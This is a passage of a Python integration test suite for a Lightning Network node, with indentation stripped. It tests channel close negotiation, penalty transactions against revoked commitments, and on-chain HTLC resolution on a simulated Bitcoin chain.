p.daemon.wait_for_log(' to ONCHAIN')
wait_for(lambda: 'ONCHAIN:Tracking mutual close transaction' in only_one(p.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'])
l1.daemon.wait_for_logs([' to ONCHAIN'] * num_peers)
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_closing_negotiation_reconnect(node_factory, bitcoind):
disconnects = ['-WIRE_CLOSING_SIGNED',
'@WIRE_CLOSING_SIGNED',
'+WIRE_CLOSING_SIGNED']
l1 = node_factory.get_node(disconnect=disconnects, may_reconnect=True)
l2 = node_factory.get_node(may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
chan = l1.fund_channel(l2, 10**6)
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
# This should return with an error, then close.
with pytest.raises(RpcError, match=r'Channel close negotiation not finished'):
l1.rpc.close(chan, False, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool (happens async, so
# CLOSINGD_COMPLETE may come first).
l1.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
l2.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_inhtlc(node_factory, bitcoind, executor):
"""Test penalty transaction with an incoming HTLC"""
# We suppress each one after first commit; HTLC gets added not fulfilled.
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'], may_fail=True, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'])
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l1.pay, l2, 100000000)
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# They should both have commitments blocked now.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 got l2's commitment to the HTLC, and sent to master.
l1.daemon.wait_for_log('UPDATE WIRE_CHANNEL_GOT_COMMITSIG')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Should fulfill.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Payment should now complete.
t.result(timeout=10)
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
wait_for(lambda: len(l2.getactivechannels()) == 0)
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 2
# Allow some lossage for fees.
assert sum(o['value'] for o in outputs) < 10**6
assert sum(o['value'] for o in outputs) > 10**6 - 15000
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_outhtlc(node_factory, bitcoind, executor):
"""Test penalty transaction with an outgoing HTLC"""
# First we need to get funds to l2, so suppress after second.
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'], may_fail=True, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'])
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Move some across to l2.
l1.pay(l2, 200000000)
assert not l1.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
assert not l2.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l2.pay, l1, 100000000)
# Make sure we get signature from them.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_ADD_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_COMMITMENT_SIGNED')
# They should both have commitments blocked now.
l1.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
l2.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
# Make sure both sides got revoke_and_ack for that commitment.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Thread should complete.
t.result(timeout=10)
# Make sure both sides got revoke_and_ack for final.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/OUR_HTLC')
l2.daemon.logsearch_start = needle
l2.daemon.wait_for_log('Ignoring output.*: THEIR_REVOKED_UNILATERAL/OUTPUT_TO_US')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 3
# Allow some lossage for fees.
assert sum(o['value'] for o in outputs) < 10**6
assert sum(o['value'] for o in outputs) > 10**6 - 15000
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_first_commit(node_factory, bitcoind):
"""Onchain handling where funder immediately drops to chain"""
# HTLC 1->2, 1 fails just after funding.
disconnects = ['+WIRE_FUNDING_LOCKED', 'permfail']
l1 = node_factory.get_node(disconnect=disconnects)
# Make locktime different, as we once had them reversed!
l2 = node_factory.get_node(options={'watchtime-blocks': 10})
l1.fundwallet(10**7)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_unwatch(node_factory, bitcoind):
"""Onchaind should not watch random spends"""
l1, l2 = node_factory.line_graph(2)
l1.pay(l2, 200000000)
l1.rpc.dev_fail(l2.info['id'])
l1.daemon.wait_for_log('Failing due to dev-fail command')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# First time it sees it, onchaind cares.
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal '
'OUR_DELAYED_RETURN_TO_WALLET')
# Now test unrelated onchain churn.
# Daemon gets told about wallet; says it doesn't care.
l1.rpc.withdraw(l1.rpc.newaddr()['address'], 'all')
bitcoind.generate_block(1)
l1.daemon.wait_for_log("but we don't care")
# And lightningd should respect that!
assert not l1.daemon.is_in_log("Can't unwatch txid")
# So these should not generate further messages
for i in range(5):
l1.rpc.withdraw(l1.rpc.newaddr()['address'], 'all')
bitcoind.generate_block(1)
# Make sure it digests the block
sync_blockheight(bitcoind, [l1])
# We won't see this again.
assert not l1.daemon.is_in_log("but we don't care",
start=l1.daemon.logsearch_start)
# Note: for this test we leave onchaind running, so we can detect
# any leaks!
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchaind_replay(node_factory, bitcoind):
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
options = {'watchtime-blocks': 201, 'cltv-delta': 101}
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options=options, disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(options=options)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchaind_replay', 'desc')['payment_hash']
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 101,
'channel': '1:1:1'
}
l1.rpc.sendpay([routestep], rhash)
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
# Wait for nodes to notice the failure; this search needle is after the
# DB commit so we're sure the tx entries in onchaindtxs have been added
l1.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
l2.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
# We should at least have the init tx now
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
assert len(l2.db_query("SELECT * FROM channeltxs;")) > 0
# Generate some blocks so we restart the onchaind from DB (we rescan
# last_height - 100)
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l1, l2])
# l1 should still have a running onchaind
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
l2.rpc.stop()
l1.restart()
# Can't wait for it, it's after the "Server started" wait in restart()
assert l1.daemon.is_in_log(r'Restarting onchaind for channel')
# l1 should still notice that the funding was spent and that we should react to it
l1.daemon.wait_for_log("Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET")
sync_blockheight(bitcoind, [l1])
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_dust_out(node_factory, bitcoind, executor):
"""Onchain handling of outgoing dust htlcs (they should fail)"""
# HTLC 1->2, 1 fails after it's irrevocably committed
disconnects = ['@WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Must be dust!
rhash = l2.rpc.invoice(1, 'onchain_dust_out', 'desc')['payment_hash']
routestep = {
'msatoshi': 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1:1:1'
}
l1.rpc.sendpay([routestep], rhash)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: missing in commitment tx'):
payfuture.result(5)
# Retry payment, this should fail (and, as a side-effect, tickle a
# bug).
with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
l1.rpc.sendpay([routestep], rhash)
# 6 later, l1 should collect its to-self payment.
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Restart l1, it should not crash!
l1.restart()
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_dust_out')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_timeout(node_factory, bitcoind, executor):
"""Onchain handling of outgoing failed htlcs"""
# HTLC 1->2, 1 fails just after it's irrevocably committed
disconnects = ['+WIRE_REVOKE_AND_ACK*3', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1:1:1'
}
l1.rpc.sendpay([routestep], rhash)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# Make sure CLTVs are different, in case it confuses onchaind.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1])
# Second one will cause drop to chain.
l1.rpc.sendpay([routestep], rhash)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 6 blocks'])
bitcoind.generate_block(4)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: timed out'):
payfuture.result(5)
# 2 later, l1 spends HTLC (5 blocks total).
bitcoind.generate_block(2)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 89 later, l2 is done.
bitcoind.generate_block(89)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_middleman(node_factory, bitcoind):
# HTLC 1->2->3, 1->2 goes down after 2 gets preimage from 3.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l1 = node_factory.get_node()
l2 = node_factory.get_node(disconnect=disconnects)
l3 = node_factory.get_node()
# l2 connects to both, so l1 can't reconnect and thus l2 drops to chain
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.fund_channel(l1, 10**6)
c23 = l2.fund_channel(l3, 10**6)
# Make sure routes finalized.
bitcoind.generate_block(5)
l1.wait_channel_active(c23)
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
rhash = l3.rpc.invoice(10**8, 'middleman', 'desc')['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash)
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('OUR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, and spend to-us (any order)
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
# Three more, l2 can spend to-us.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# One more block, HTLC tx is now spendable.
l1.bitcoin.generate_block(1)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l2 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_feechange(node_factory, bitcoind, executor):
"""Onchain handling when we restart with different fees"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1 = node_factory.get_node(may_reconnect=True)
l2 = node_factory.get_node(disconnect=disconnects,
may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1:1:1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash)
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Make sure that gets included.
bitcoind.generate_block(1)
# Now we restart with different feerates.
l1.stop()
l1.daemon.cmd_line.append('--override-fee-rates=20000/9000/2000')
l1.start()
# We recognize different proposal as ours.
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
# We use 3 blocks for "reasonable depth", so add two more
bitcoind.generate_block(2)
# Note that the very similar test_onchain_timeout looks for a
# different string: that's because it sees the JSONRPC response,
# and due to the l1 restart, there is none here.
l1.daemon.wait_for_log('WIRE_PERMANENT_CHANNEL_FAILURE')
# 90 later, l2 is done
bitcoind.generate_block(89)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 7 blocks and l1 should be done.
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev-set-fees")
def test_onchain_all_dust(node_factory, bitcoind, executor):
"""Onchain handling when we reduce output to all dust"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**7 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1:1:1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash)
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
# Make l1's fees really high (and wait for it to exceed 50000)
l1.set_feerates((100000, 100000, 100000))
l1.daemon.wait_for_log('Feerate estimate for normal set to [56789][0-9]{4}')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by IGNORING_TINY_PAYMENT .* after 6 blocks')
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('IGNORING_TINY_PAYMENT',
'THEIR_UNILATERAL/OUR_HTLC')
l1.daemon.wait_for_log('Ignoring output 0 of .*: THEIR_UNILATERAL/OUR_HTLC')
# 100 deep and l2 forgets.
bitcoind.generate_block(93)
sync_blockheight(bitcoind, [l1, l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# l1 does not wait for ignored payment.
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_fail")
def test_onchain_different_fees(node_factory, bitcoind, executor):
"""Onchain handling when we've had a range of fees"""
l1, l2 = node_factory.line_graph(2, fundchannel=True, fundamount=10**7,
opts={'may_reconnect': True})
l2.rpc.dev_ignore_htlcs(id=l1.info['id'], ignore=True)
p1 = executor.submit(l1.pay, l2, 1000000000)
l1.daemon.wait_for_log('htlc 0: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
l1.set_feerates((16000, 7500, 3750))
p2 = executor.submit(l1.pay, l2, 900000000)
l1.daemon.wait_for_log('htlc 1: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
# Restart with different feerate for second HTLC.
l1.set_feerates((5000, 5000, 3750))
l1.restart()
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
p3 = executor.submit(l1.pay, l2, 800000000)
l1.daemon.wait_for_log('htlc 2: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
# Drop to chain
l1.rpc.dev_fail(l2.info['id'])
l1.wait_for_channel_onchain(l2.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Both sides should have correct feerate
assert l1.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 16000
}]
assert l2.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 16000
}]
bitcoind.generate_block(5)
# Three HTLCs, and one for the to-us output.
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 4)
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
with pytest.raises(Exception):
p1.result(10)
with pytest.raises(Exception):
p2.result(10)
with pytest.raises(Exception):
p3.result(10)
# Two more for HTLC timeout tx to be spent.
bitcoind.generate_block(2)
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 3)
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_new_commit(node_factory, bitcoind, executor):
# Test case where we have two possible commits: it will use new one.
disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, new commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# OK, time out HTLC.
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
l2.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
def setup_multihtlc_test(node_factory, bitcoind):
# l1 -> l2 -> l3 -> l4 -> l5 -> l6 -> l7
# l1 and l7 ignore any HTLCs they're sent.
# For each direction, we create these HTLCs with same payment_hash:
# 1 failed (CLTV1)
# 1 failed (CLTV2)
# 2 live (CLTV2)
# 1 live (CLTV3)
nodes = node_factory.line_graph(7, announce=True,
opts={'dev-no-reconnect': None,
'may_reconnect': True})
# Balance by pushing half the funds.
b11 = nodes[-1].rpc.invoice(10**9 // 2, '1', 'balancer')['bolt11']
nodes[0].rpc.pay(b11)
nodes[0].rpc.dev_ignore_htlcs(id=nodes[1].info['id'], ignore=True)
nodes[-1].rpc.dev_ignore_htlcs(id=nodes[-2].info['id'], ignore=True)
preimage = "0" * 64
h = nodes[0].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
nodes[-1].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
# First, the failed attempts (paying wrong node). CLTV1
r = nodes[0].rpc.getroute(nodes[-2].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h)
with pytest.raises(RpcError, match=r'UNKNOWN_PAYMENT_HASH'):
nodes[0].rpc.waitsendpay(h)
r = nodes[-1].rpc.getroute(nodes[1].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h)
with pytest.raises(RpcError, match=r'UNKNOWN_PAYMENT_HASH'):
nodes[-1].rpc.waitsendpay(h)
# Now increment CLTV -> CLTV2
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
